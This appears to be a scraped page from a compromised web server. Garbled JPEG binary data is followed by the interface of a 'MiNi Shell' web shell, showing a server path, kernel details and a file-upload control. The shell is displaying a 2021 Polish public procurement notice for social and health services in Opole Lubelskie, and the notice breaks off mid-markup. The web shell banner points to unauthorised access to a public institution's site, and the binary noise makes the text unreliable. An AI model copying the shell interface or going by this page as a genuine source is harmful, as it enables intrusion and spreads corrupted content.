JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211014/0023238001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usług społecznych (prozdrowotnych, psychologicznych, integracyjnych) w Centrum Usług Społecznych w Opolu Lubelskim”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG SPOŁECZNYCH W OPOLU LUBELSKIM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 004165258</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole Lubelskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81 827 26 94</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">81 827 26 94</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cusopolelubelskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.opsopolelubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usług społecznych (prozdrowotnych, psychologicznych, integracyjnych) w Centrum Usług Społecznych w Opolu Lubelskim”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d922132f-2cbe-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00232380</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00057999/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa specjalistyczna -medyczna</p> <p class="mb-0">1.3.2 Warsztaty z integracji międzypokoleniowej</p> <p class="mb-0">1.3.4 Świadczenie usług psychologicznych dla beneficjentów Klubu integracji Społecznej.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie realizowane jest w ramach projektu pod nazwą: „CUS w Gminie Opole Lubelskie w ramach działania 2.8 Rozwój usług społecznych świadczonych w środowisku lokalnym w ramach Programu Operacyjnego Wiedza Edukacja Rozwój. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzp.opolelubelskie.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzp.opolelubelskie.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej: (1) Platformy Zamówień Publicznych ZETOPZP:<br/>https://pzp.opolelubelskie.pl/ Uwaga: Aby znaleźć na platformie zakupowej ZETO niniejsze<br/>postępowanie należy z menu po lewej stronie wybrać z zakładki „Jednostka” CUS i przejść do<br/>niniejszego postępowania, poczty elektronicznej: sekretariat@cusopolelubelskie.pl- którą należy<br/>traktować wyłącznie jako tzw. „awaryjną”, w przypadku problemów technicznych. Szczegóły techniczne<br/>zawarte w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem danych osobowych jest Centrum Usług Społecznych w Opolu Lubelskim ul.<br/>Kościuszki 4, 24-300 Opole Lubelskie, tel: 81 827 26 94, 81 827 26 94 e-mail:<br/>sekretariat@cusopolelubelskie.pl<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować poprzez<br/>adres e-mail: iod.cus@opolelubelskie.pl lub pisemnie na adres siedziby Administratora.<br/>3. Dane osobowe są przetwarzane w celu wyłonienia wykonawcy w ramach postępowań o udzielenie<br/>zamówienia lub organizacji konkursu realizowanego w trybie wynikającym z odpowiednich przepisów<br/>prawa lub w celu zawarcia, realizacji i rozliczenia umowy.<br/>4. Podstawą prawną przetwarzania jest 6 ust. 1 lit. b) lub lit. c) w związku z przepisami ustawy z dnia 11<br/>września 2019 r. - Prawo zamówień publicznych (Pzp) oraz ustawy z dnia 23 kwietnia 1964 r. Kodeks<br/>cywilny.<br/>5. Odbiorcami danych osobowych mogą być w szczególności: Poczta Polska S.A., bank obsługujący<br/>jednostkę, podmioty świadczące dla Administratora usługi: kurierskie, prawne oraz inne organy<br/>publiczne, Prezes Urzędu Zamówień Publicznych, Krajowa Izba Odwoławcza, a w przypadku umów<br/>współfinansowanych podmioty współfinansujące, kontrolujące i zarządzające lub inne podmioty<br/>zaangażowane w realizację programu, z którego pochodzi dofinansowanie, podmiot zewnętrzny nie<br/>uczestniczący w postępowaniu oraz inne organy publiczne, sądy i inni odbiorcy legitymujący się<br/>interesem prawnym w pozyskaniu danych osobowych. Państwa dane osobowe mogą być<br/>udostępnione wyłącznie organom lub podmiotom upoważnionym na podstawie odrębnych przepisów<br/>lub podmiotom przetwarzającym dane w imieniu administratora danych.<br/>6. Dane będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp, tj. przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy.<br/>7. Przysługuje Panu/Pani prawo: dostępu do danych osobowych, sprostowania Pana/Pani danych<br/>osobowych, usunięcia danych osobowych, ograniczenia przetwarzania Pana/Pani danych osobowych<br/>wniesienia, wniesienia skargi do organu nadzorczego zajmującego się ochroną danych osobowych, tj.<br/>do Prezesa Urzędu Ochrony Danych Osobowych.<br/>8. Podanie danych osobowych jest warunkiem niezbędnym do celów związanych z ubieganiem się o<br/>udzielenie zamówienia. Odmowa podania danych skutkuje brakiem możliwości uczestnictwa w<br/>procesie udzielania zamówień lub organizacji konkursu.<br/>9. Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie<br/>profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUS. 271.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I: Usługi prozdrowotne z zakresu wsparcia lekarza chorób wewnętrznych: dla minimum<br/>100 osób w zakresie wizyt lekarzy specjalistów dla osób potrzebujących zgłaszających się do<br/>Wydziału CUS Ds. Pomocy Środowiskowej i Organizowania Usług Społecznych do<br/>Koordynatora Indywidualnych Planów Usług Społecznych w wymiarze łącznym 225 godzin<br/>(godzin zegarowych po 60 min) tj: w podziale:<br/>100 godzin od dnia podpisania umowy do 28.02.2022 r.,<br/>100 godzin od 01.03.2022 roku do 31.12.2022 roku,<br/>25 godzin od 01.01.2023 roku do 30.03.2023 roku </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-03-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1<br/>pkt 7 ustawy. Zamówienia będą polegały na zleceniu wykonawcy podobnych rodzajowo usług w<br/>zakresie prowadzenia usług psychologicznych oraz usług integracyjnych adekwatnych do przedmiotu<br/>zamówienia podstawowego do 50 % wartości zamówienia podstawowego w terminie do 3 lat od<br/>udzielenia zamówienie podstawowego. Warunki w zakresie terminów płatności będą określone na<br/>zasadach wynikających z projektowanych postanowień umownych załączonych do zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające<br/>wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.1.oferta spełnia wymagania określone niniejszą specyfikacją,<br/>1.2.oferta została złożona, w określonym przez zamawiającego terminie,<br/>1.3. Wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego.<br/>2. Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową<br/>zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków<br/>przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów<br/>ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru<br/>najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną<br/>punktację: punktacja 0-100 (100%=100pkt).<br/>4. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert<br/>przedstawione poniżej.Lp. Nazwa kryterium Waga kryterium<br/>1) Cena 60<br/>2) Dodatkowe doświadczenie 40<br/>5. Dodatkowe postanowienia dot. kryterium cena:<br/>Punkty w tym kryterium zostaną przyznane według wzoru:<br/>C = (C min/C o) x 60 pkt<br/>gdzie:<br/>C min- najniższa cena brutto z ocenianych ofert (zł)<br/>C o - cena brutto określona w ocenianej ofercie (zł)<br/>6. Dodatkowe postanowienia dot. kryterium Dodatkowe doświadczenie:<br/>Liczba punktów w kryterium Dodatkowe doświadczenie zostanie przyznana za dodatkowe<br/>doświadczenie osoby wskazanej do realizacji zamówienia w wykazie osób (wymagane doświadczenie<br/>minimum 2 lata):<br/>Kryterium<br/>Doświadczenie (D) 3 lata i więcej – 40 punktów Więcej niż 2 a mniej niż 3 lata – 20 punktów 2 lata –<br/>0 punktów<br/>W przypadku, gdy Wykonawca nie wypełni stosownego pola w formularzu ofertowym otrzyma w tym<br/>kryterium 0 punktów.<br/>Oferta Wykonawcy, który wskaże doświadczenie krótsze, niż 2 lata, zostanie odrzucona na podstawie<br/>art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>Wzór do obliczeń:<br/>Sp = C + D<br/>gdzie: Sp – Suma punktów przyznana wykonawcy w kryteriach: cena oferty, doświadczenie,<br/>C – ilość punktów przyznana w kryterium: cena oferty<br/>D- ilość punktów przyznana w kryterium: doświadczenie<br/>7. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma<br/>maksymalną liczbę punktów. Pozostałym wykonawcom, wypełniającym wymagania kryterialne<br/>przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie<br/>traktowany jako wartość punktowa oferty.<br/>8. Wynik - oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów<br/>w oparciu o ustalone kryteria) zostanie oceniona jako najkorzystniejsza, pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>Wykonawca, którego oferta zostanie oceniona jako najkorzystniejsza podlegać będzie badaniu czy nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, zgodnie z Rozdziałem V ust. 5<br/>niniejszej Specyfikacji.<br/>9. Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania u zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, doliczy do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z<br/>tymi przepisami.<br/>10. Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej w celu wyboru<br/>najkorzystniejszej spośród ofert uznanych za ważne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: Usługi prozdrowotne z zakresu wsparcia lekarza psychiatry: dla minimum 100 osób<br/>w zakresie wizyt lekarzy specjalistów dla osób potrzebujących zgłaszających się do Wydziału<br/>CUS Ds. Pomocy Środowiskowej i Organizowania Usług Społecznych do Koordynatora<br/>Indywidualnych Planów Usług Społecznych w wymiarze łącznym 200 godzin (godzin<br/>zegarowych po 60 min) tj: w podziale:<br/>75 godzin od dnia podpisania umowy do 28.02.2022 r.,<br/>100 godzin od 01.03.2022 roku do 31.12.2022 roku,<br/>25 godzin od 01.01.2023 roku do 30.03.2023 roku </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-03-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1<br/>pkt 7 ustawy. Zamówienia będą polegały na zleceniu wykonawcy podobnych rodzajowo usług w<br/>zakresie prowadzenia usług psychologicznych oraz usług integracyjnych adekwatnych do przedmiotu<br/>zamówienia podstawowego do 50 % wartości zamówienia podstawowego w terminie do 3 lat od<br/>udzielenia zamówienie podstawowego. Warunki w zakresie terminów płatności będą określone na<br/>zasadach wynikających z projektowanych postanowień umownych załączonych do zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające<br/>wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.1.oferta spełnia wymagania określone niniejszą specyfikacją,<br/>1.2.oferta została złożona, w określonym przez zamawiającego terminie,<br/>1.3. Wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego.<br/>2. Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową<br/>zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków<br/>przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów<br/>ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru<br/>najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną<br/>punktację: punktacja 0-100 (100%=100pkt).<br/>4. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert<br/>przedstawione poniżej.Lp. Nazwa kryterium Waga kryterium<br/>1) Cena 60<br/>2) Dodatkowe doświadczenie 40<br/>5. Dodatkowe postanowienia dot. kryterium cena:<br/>Punkty w tym kryterium zostaną przyznane według wzoru:<br/>C = (C min/C o) x 60 pkt<br/>gdzie:<br/>C min- najniższa cena brutto z ocenianych ofert (zł)<br/>C o - cena brutto określona w ocenianej ofercie (zł)<br/>6. Dodatkowe postanowienia dot. kryterium Dodatkowe doświadczenie:<br/>Liczba punktów w kryterium Dodatkowe doświadczenie zostanie przyznana za dodatkowe<br/>doświadczenie osoby wskazanej do realizacji zamówienia w wykazie osób (wymagane doświadczenie<br/>minimum 2 lata):<br/>Kryterium<br/>Doświadczenie (D) 3 lata i więcej – 40 punktów Więcej niż 2 a mniej niż 3 lata – 20 punktów 2 lata –<br/>0 punktów<br/>W przypadku, gdy Wykonawca nie wypełni stosownego pola w formularzu ofertowym otrzyma w tym<br/>kryterium 0 punktów.<br/>Oferta Wykonawcy, który wskaże doświadczenie krótsze, niż 2 lata, zostanie odrzucona na podstawie<br/>art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>Wzór do obliczeń:<br/>Sp = C + D<br/>gdzie: Sp – Suma punktów przyznana wykonawcy w kryteriach: cena oferty, doświadczenie,<br/>C – ilość punktów przyznana w kryterium: cena oferty<br/>D- ilość punktów przyznana w kryterium: doświadczenie<br/>7. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma<br/>maksymalną liczbę punktów. Pozostałym wykonawcom, wypełniającym wymagania kryterialne<br/>przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie<br/>traktowany jako wartość punktowa oferty.<br/>8. Wynik - oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów<br/>w oparciu o ustalone kryteria) zostanie oceniona jako najkorzystniejsza, pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>Wykonawca, którego oferta zostanie oceniona jako najkorzystniejsza podlegać będzie badaniu czy nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, zgodnie z Rozdziałem V ust. 5<br/>niniejszej Specyfikacji.<br/>9. Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania u zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, doliczy do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z<br/>tymi przepisami.<br/>10. Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej w celu wyboru<br/>najkorzystniejszej spośród ofert uznanych za ważne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span 